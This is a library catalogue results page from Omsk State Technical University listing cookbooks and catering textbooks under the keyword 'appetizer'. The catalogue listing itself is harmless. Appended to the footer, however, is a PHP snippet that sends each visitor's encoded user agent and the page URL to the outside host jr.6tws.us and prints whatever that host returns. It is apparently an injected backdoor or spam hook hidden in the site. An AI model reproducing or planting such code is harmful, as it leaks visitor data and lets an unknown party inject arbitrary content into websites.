Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

49 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ЗАКУСКА")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 52
1. 
Обед по-европейски [Текст] : издания для досуга / Сост. Н. Бережных, 2004. - 120 с.
Держатели документа (Информация об экземплярах) 
2. 
Китайская кухня [Текст] : издания для досуга, 2003. - 120 с.
Держатели документа (Информация об экземплярах) 
3. 
Антонова М. А. Русская кухня [Текст] : издания для досуга / М. А. Антонова, С. В. Антонов, 2004. - 222 с.
Держатели документа (Информация об экземплярах) 
4. 
Поскребышева Г. И. Праздничный стол [Текст] : издания для досуга / Г. И. Поскребышева, 2004. - 191 с.
Держатели документа (Информация об экземплярах) 
5. 
Миллион меню современной Европы [Текст] : издания для досуга / Сост. О. Шаллер, 2004. - [600 разрезных + 12] с.
Держатели документа (Информация об экземплярах) 
6. 
Закуски для фуршета [Текст] : справочное издание / Пер с англ. Т. Т. Черезовой, 2003. - 93 с.
Держатели документа (Информация об экземплярах) 
7. 
Люка А. П. Европейская кухня [Текст] : издания для досуга / А. П. Люка, 2004. - 174 с.
Держатели документа (Информация об экземплярах) 
8. 
Миллион меню. Любимые блюда Востока [Текст] : издания для досуга / Сост. И. А. Кириллова, 2003. - [600 разрезных + 20] с.
Держатели документа (Информация об экземплярах) 
9. 
Богушева В. И. Бары и рестораны. Искусство обслуживания [Текст] : [учеб. пособие] / В. И. Богушева, 2001. - 351 с.
Держатели документа (Информация об экземплярах) 
10. 
Салаты и закуски [Видеозапись, кинофильм, микроформа] : [Видеофильм], 1997. - 1 вк.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
11. 
Шатун Л. Г. Технология приготовления пищи [Текст] : Учеб. / Л. Г. Шатун, 2004. - 479 с.
Ключевые слова 
ПИТАНИЕ ОБЩЕСТВЕННОЕ -- КОНТРОЛЬ КАЧЕСТВА блюд -- Клеймо ветеринарное -- МЕНЮ -- ПИТАНИЕ учащихся -- БАД -- ДОБАВКА ПИЩЕВАЯ -- ОБРАБОТКА ОВОЩЕЙ -- ОБРАБОТКА ГРИБОВ -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ДИЧИ -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА ПРОДУКТОВ тепловая -- СУП -- БЛЮДА МЯСНЫЕ -- СОУС -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА РЫБНЫЕ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА ХОЛОДНЫЕ -- ЗАКУСКА -- БЛЮДА СЛАДКИЕ -- НАПИТКИ -- ПИТАНИЕ ДИЕТИЧЕСКОЕ -- ПИТАНИЕ ЛЕЧЕБНОЕ -- БЛЮДА ИЗ сои -- Соя -- ПРАВИЛА отпуска блюд -- ПРАВИЛА подачи напитков
Держатели документа (Информация об экземплярах) 
12. 
Сидорина Е. И. Современная кухня [Текст] : кулинар. рецепты из доступ. продуктов / Е. И. Сидорина, 1993. - 543 с.
Ключевые слова 
СЕРВИРОВКА СТОЛА -- ЗАКУСКА ХОЛОДНАЯ -- САЛАТ -- ВИНЕГРЕТ -- ПАШТЕТ -- ЗАЛИВНОЕ -- БУТЕРБРОД -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ РЫБЫ -- СЫР -- БЛЮДА ИЗ ЯИЦ -- СУП -- БОРЩ -- ЩИ -- РАССОЛЬНИК -- СУП ОВОЩНОЙ -- УХА -- СУП МОЛОЧНЫЙ -- СУП ГРИБНОЙ -- БЛИНЫ -- ОЛАДЬИ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ БОБОВЫХ -- ЗАПЕКАНКА -- ПЛОВ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КАРТОФЕЛЯ -- СОУС -- ТЕСТО ДРОЖЖЕВОЕ -- ТЕСТО СЛОЕНОЕ -- ТОРТЫ -- ТЕСТО БИСКВИТНОЕ -- ПЕЧЕНЬЕ -- ХВОРОСТ -- ВАФЛИ -- КЕКС -- ПИРОГ -- КРЕМ МАСЛЯНЫЙ -- КРЕМ БЕЛКОВЫЙ -- КРЕМ ЗАВАРНОЙ -- МУСС -- ЖЕЛЕ -- КОМПОТ -- КИСЕЛЬ -- БЛЮДА СЛАДКИЕ -- ЗАГОТОВКИ -- КАПУСТА КВАШЕНАЯ -- КОНСЕРВИРОВАНИЕ -- МАРИНОВАНИЕ -- ВАРЕНЬЕ -- ДЖЕМ -- ЦУКАТЫ
13. 
Чудеса в микроволновой печи [Текст] : рецепты и полез. советы для кулинара / сост. О. В. Крылова, 1994. - 286, [2] с.
14. 
Современная киргизская кухня [Текст] : сб. рецептур / сост. С. Ш. Ибрагимова, 1991. - 222, [2] с.
15. 
Богушева В.И. Организация обслуживания посетителей ресторанов и баров [Текст] : Уч.пособие гриф-МО / В. И. Богушева, 2002. - 410 с.
Держатели документа (Информация об экземплярах) 
16. 
Калашников, Александр Юрьевич. Кафе, бары и рестораны [Текст] : производственно-практическое издание / А. Ю. Калашников, 2005. - 384 с.
17. 
Барановский В. А. Рецептурный справочник повара [Текст] : справочное издание / В. А. Барановский, 2003. - 379 с.
Ключевые слова 
ОБРАБОТКА ПРОДУКТОВ -- БЕЛКИ -- ЖИРЫ -- УГЛЕВОДЫ -- ОБРАБОТКА ОВОЩЕЙ -- ОБРАБОТКА ГРИБОВ -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА НЕРЫБНОГО ВОДНОГО -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ДИЧИ -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА КРОЛИКОВ -- БЛЮДА ХОЛОДНЫЕ -- ЗАКУСКА -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- БЛЮДА ИЗ БОБОВЫХ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА РЫБНЫЕ -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ ПТИЦЫ -- БЛЮДА ИЗ дичи -- БЛЮДА ИЗ кролика -- СОУС -- БЛЮДА СЛАДКИЕ -- ТЕСТО -- ФАРШ
Держатели документа (Информация об экземплярах) 
18. 
Барановский В. А. Повар-технолог [Текст] : Учеб. пособие для студ. сред. спец. заведений / В. А. Барановский, 2003. - 415 с.
Ключевые слова 
ФИЗИОЛОГИЯ ПИТАНИЯ -- САНИТАРИЯ -- ГИГИЕНА ОБЩЕСТВЕННОГО ПИТАНИ -- ПИТАНИЕ -- ГИГИЕНА ЛИЧНАЯ повара -- ОБРАБОТКА продуктов -- ОБРАБОТКА ОВОЩЕЙ -- ОБРАБОТКА ГРИБОВ -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА ДИЧИ -- ОБРАБОТКА КРОЛИКОВ -- БЛЮДА ХОЛОДНЫЕ -- БЛЮДА горячие -- ЗАКУСКА -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА РЫБНЫЕ -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ ПТИЦЫ -- СУП -- СОУС -- ПРЯНОСТИ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ БОБОВЫХ -- БЛЮДА СЛАДКИЕ -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- НАПИТКИ -- ТЕСТО -- ТЕСТО ДРОЖЖЕВОЕ -- ТЕСТО БЕЗДРОЖЖЕВОЕ -- ТЕСТО слоеное -- ТЕСТО песочное -- ТЕСТО бисквитное -- ТЕСТО заварное
Держатели документа (Информация об экземплярах) 
19. 
Экспресс-курс повара [Текст] : учебное пособие / Авт.-сост. В. Полякова, 2002. - 447 с.
Держатели документа (Информация об экземплярах) 
20. 
Романова, Татьяна Викторовна. Приятного аппетита! [Текст] / Т. В. Романова, 1990. - 199, [1] с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3107 - 12.12.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.95 с.12 запросов, 0.64c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;